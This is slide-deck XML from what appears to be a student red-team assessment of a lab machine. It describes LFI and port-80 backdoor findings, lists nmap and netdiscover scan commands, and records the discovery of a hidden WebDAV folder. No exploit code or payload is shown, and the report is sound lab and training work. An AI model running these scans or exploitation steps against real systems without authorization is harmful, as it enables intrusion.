                          <a:ea typeface="Roboto"/>
                          <a:cs typeface="Roboto"/>
                          <a:sym typeface="Roboto"/>
                        </a:rPr>
                        <a:t>This vulnerability allows attackers to establish backdoor connection via outbound port 80. The Red Team’s malicious payload allowed then to abuse the HTTP user-agent header and execute commands, gaining shell access to the machine.</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r h="767375">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en" sz="1200">
                          <a:latin typeface="Roboto"/>
                          <a:ea typeface="Roboto"/>
                          <a:cs typeface="Roboto"/>
                          <a:sym typeface="Roboto"/>
                        </a:rPr>
                        <a:t>Local File Inclusion (LFI)</a:t>
                      </a:r>
                      <a:endParaRPr sz="1200">
                        <a:latin typeface="Roboto"/>
                        <a:ea typeface="Roboto"/>
                        <a:cs typeface="Roboto"/>
                        <a:sym typeface="Roboto"/>
                      </a:endParaRPr>
                    </a:p>
                    <a:p>
                      <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en" sz="1200">
                          <a:latin typeface="Roboto"/>
                          <a:ea typeface="Roboto"/>
                          <a:cs typeface="Roboto"/>
                          <a:sym typeface="Roboto"/>
                        </a:rPr>
                        <a:t>CVE-2021-31783</a:t>
                      </a:r>
                      <a:endParaRPr sz="12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Roboto"/>
                          <a:ea typeface="Roboto"/>
                          <a:cs typeface="Roboto"/>
                          <a:sym typeface="Roboto"/>
                        </a:rPr>
                        <a:t>LFI is a vulnerability in poorly designed web applications.  This allows users to upload content into the application or servers.</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solidFill>
                      <a:srgbClr val="DBD9E8"/>
                    </a:solidFill>
                  </a:tcPr>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en" sz="1100">
                          <a:latin typeface="Roboto"/>
                          <a:ea typeface="Roboto"/>
                          <a:cs typeface="Roboto"/>
                          <a:sym typeface="Roboto"/>
                        </a:rPr>
                        <a:t>An LFI vulnerability allows an attacker to upload a malicious payload.  The Red Team was able to gain access to sensitive </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en" sz="1100">
                          <a:latin typeface="Roboto"/>
                          <a:ea typeface="Roboto"/>
                          <a:cs typeface="Roboto"/>
                          <a:sym typeface="Roboto"/>
                        </a:rPr>
                        <a:t>information</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en" sz="1100">
                          <a:latin typeface="Roboto"/>
                          <a:ea typeface="Roboto"/>
                          <a:cs typeface="Roboto"/>
                          <a:sym typeface="Roboto"/>
                        </a:rPr>
                        <a:t> and directories that were clearly marked as not being intended to be exposed to the internet.</a:t>
                      </a:r>
                      <a:endParaRPr sz="1100">
                        <a:latin typeface="Roboto"/>
                        <a:ea typeface="Roboto"/>
                        <a:cs typeface="Roboto"/>
                        <a:sym typeface="Roboto"/>
                      </a:endParaRPr>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marT="91425" marB="91425" marR="182875" marL="182875">
                    <a:lnL cap="flat" cmpd="sng" w="9525">
                      <a:solidFill>
                        <a:srgbClr val="A9B7C0"/>
                      </a:solidFill>
                      <a:prstDash val="solid"/>
                      <a:round/>
                      <a:headEnd len="sm" w="sm" type="none"/>
                      <a:tailEnd len="sm" w="sm" type="none"/>
                    </a:lnL>
                    <a:lnR cap="flat" cmpd="sng" w="9525">
                      <a:solidFill>
                        <a:srgbClr val="A9B7C0"/>
                      </a:solidFill>
                      <a:prstDash val="solid"/>
                      <a:round/>
                      <a:headEnd len="sm" w="sm" type="none"/>
                      <a:tailEnd len="sm" w="sm" type="none"/>
                    </a:lnR>
                    <a:lnT cap="flat" cmpd="sng" w="9525">
                      <a:solidFill>
                        <a:srgbClr val="A9B7C0"/>
                      </a:solidFill>
                      <a:prstDash val="solid"/>
                      <a:round/>
                      <a:headEnd len="sm" w="sm" type="none"/>
                      <a:tailEnd len="sm" w="sm" type="none"/>
                    </a:lnT>
                    <a:lnB cap="flat" cmpd="sng" w="9525">
                      <a:solidFill>
                        <a:srgbClr val="A9B7C0"/>
                      </a:solidFill>
                      <a:prstDash val="solid"/>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62"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="-12300" y="0"/>
            <a:ext cx="9168600" cy="533700"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchorCtr="0" anchor="t" bIns="91425" lIns="457200" spcFirstLastPara="1" rIns="274300" wrap="square" tIns="182875">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>Exploitation: Open Web Port (80) </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1700"/>
              <a:t>CVE-2019-6579</a:t>
            </a:r>
            <a:endParaRPr sz="1700"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1098" name="Google Shape;1098;p62"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="2" type="subTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="-12300" y="4916650"/>
            <a:ext cx="9144000" cy="226800"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchorCtr="0" anchor="t" bIns="0" lIns="274300" spcFirstLastPara="1" rIns="0" wrap="square" tIns="45700">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>																			10</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1099" name="Google Shape;1099;p62"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off x="724275"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2"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="724275" y="1480624"/>
            <a:ext cx="2371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Tools &amp; Processes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00">
                <a:latin typeface="Roboto"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:rPr>
              <a:t>I used nmap to scan for open ports on the target machine.</a:t>
            </a:r>
            <a:endParaRPr sz="11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00">
                <a:latin typeface="Roboto"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:rPr>
              <a:t>Commands</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1100">
                <a:latin typeface="Roboto"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:rPr>
              <a:t> used:</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netdiscover -r 192.168.1.105</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nmap -sV 192-168.1.1-105</a:t>
            </a:r>
            <a:endParaRPr sz="1100">
              <a:latin typeface="Roboto"/>
              <a:ea typeface="Roboto"/>
              <a:cs typeface="Roboto"/>
              <a:sym typeface="Roboto"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="-298450" lvl="0" marL="457200" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1100"/>
              <a:buFont typeface="Roboto"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1100">
                <a:latin typeface="Roboto"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:rPr>
              <a:t>n</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1100">
                <a:latin typeface="Roboto"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:rPr>
              <a:t>map -sS -A 192.168.1.105 </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100">
              <a:latin typeface="Roboto"/>
              <a:ea typeface="Roboto"/>
              <a:cs typeface="Roboto"/>
              <a:sym typeface="Roboto"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1100">
                <a:latin typeface="Roboto"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:rPr>
              <a:t>Target Machine</a:t>
            </a:r>
            <a:endParaRPr sz="1100">
              <a:latin typeface="Roboto"/>
              <a:ea typeface="Roboto"/>
              <a:cs typeface="Roboto"/>
              <a:sym typeface="Roboto"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1100">
                <a:latin typeface="Roboto"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:rPr>
              <a:t>192.168.1.105/meet_our_team/ashton.txt</a:t>
            </a:r>
            <a:endParaRPr sz="11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a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr sz="1200">
              <a:latin typeface="Roboto"/>
              <a:ea typeface="Roboto"/>
              <a:cs typeface="Roboto"/>
              <a:sym typeface="Roboto"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="1101" name="Google Shape;1101;p62"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="457181" y="887903"/>
            <a:ext cx="533372" cy="533480"/>
            <a:chOff x="457200" y="1378813"/>
            <a:chExt cx="695400" cy="695450"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="1102" name="Google Shape;1102;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03" name="Google Shape;1103;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4" name="Google Shape;1104;p62"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="3228956" y="887903"/>
            <a:ext cx="533372" cy="533480"/>
            <a:chOff x="457200" y="1378813"/>
            <a:chExt cx="695400" cy="695450"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="1105" name="Google Shape;1105;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06" name="Google Shape;1106;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7" name="Google Shape;1107;p62"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off x="3496050" y="1480575"/>
            <a:ext cx="2428500" cy="31542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2"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3496050" y="1480625"/>
            <a:ext cx="2428500" cy="31542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Clr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="1100"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr b="1" lang="en" sz="1200">
                <a:latin typeface="Roboto"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:rPr>
              <a:t>Achievements</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="12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00">
                <a:latin typeface="Roboto"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:rPr>
              <a:t>Nmap </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1100">
                <a:latin typeface="Roboto"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:rPr>
              <a:t>scanned</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1100">
                <a:latin typeface="Roboto"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:rPr>
              <a:t> 105 IP </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1100">
                <a:latin typeface="Roboto"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:rPr>
              <a:t>addresses</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1100">
                <a:latin typeface="Roboto"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:rPr>
              <a:t>: I found 4 hosts up: Port 22 and Port 80 are open and was of interest to me.</a:t>
            </a:r>
            <a:endParaRPr sz="11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1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00">
                <a:latin typeface="Roboto"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:rPr>
              <a:t>The discovered files on meet_our _team/ashton.txt</a:t>
            </a:r>
            <a:endParaRPr sz="11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t/>
            </a:r>
            <a:endParaRPr sz="1100">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sz="1100">
                <a:latin typeface="Roboto"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:rPr>
              <a:t>The ashton.txt allowed the discovery of the secret folder at 192.168.1.105/web/dav/company_folders/secret_folder/</a:t>
            </a:r>
            <a:endParaRPr sz="1100">
              <a:latin typeface="Roboto"/>
              <a:ea typeface="Roboto"/>
              <a:cs typeface="Roboto"/>
              <a:sym typeface="Roboto"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="1109" name="Google Shape;1109;p62"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="6134081" y="888653"/>
            <a:ext cx="533372" cy="533480"/>
            <a:chOff x="457200" y="1378813"/>
            <a:chExt cx="695400" cy="695450"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="1110" name="Google Shape;1110;p62"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="457200" y="1378813"/>
              <a:ext cx="695400" cy="621300"/>
            </a:xfrm>
            <a:prstGeom prst="roundRect">
              <a:avLst>
                <a:gd fmla="val 16667" name="adj"/>
              </a:avLst>
            </a:prstGeom>
            <a:solidFill>
              <a:srgbClr val="CC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11" name="Google Shape;1111;p62"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm rot="10800000">
              <a:off x="634726" y="1885638"/>
              <a:ext cx="340325" cy="188625"/>
            </a:xfrm>
            <a:prstGeom prst="flowChartExtract">
              <a:avLst/>
            </a:prstGeom>
            <a:solidFill>
              <a:srgbClr val="CC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2" name="Google Shape;1112;p62"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off x="6401175" y="1481325"/>
            <a:ext cx="2428500" cy="3252300"/>
          </a:xfrm>
          <a:prstGeom prst="round2DiagRect">
            <a:avLst>
              <a:gd fmla="val 16667" name="adj1"/>
              <a:gd fmla="val 0" name="adj2"/>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2"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6401175" y="1481374"/>
            <a:ext cx="2371500" cy="3252300"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchorCtr="0" anchor="t" bIns="182875" lIns="182875" spcFirstLastPara="1" rIns="182875" wrap="square" tIns="182875">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr sz="1200">
              <a:latin typeface="Roboto"/>
              <a:ea typeface="Roboto"/>
              <a:cs typeface="Roboto"/>
              <a:sym typeface="Roboto"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="1114" name="Google Shape;1114;p62"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect b="3240" l="1040" r="-1039" t="-3240"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="5924550" y="2337963"/>
            <a:ext cx="3105324" cy="2490025"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="1115" name="Google Shape;1115;p62"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="5924550" y="1474150"/>
            <a:ext cx="3105326" cy="900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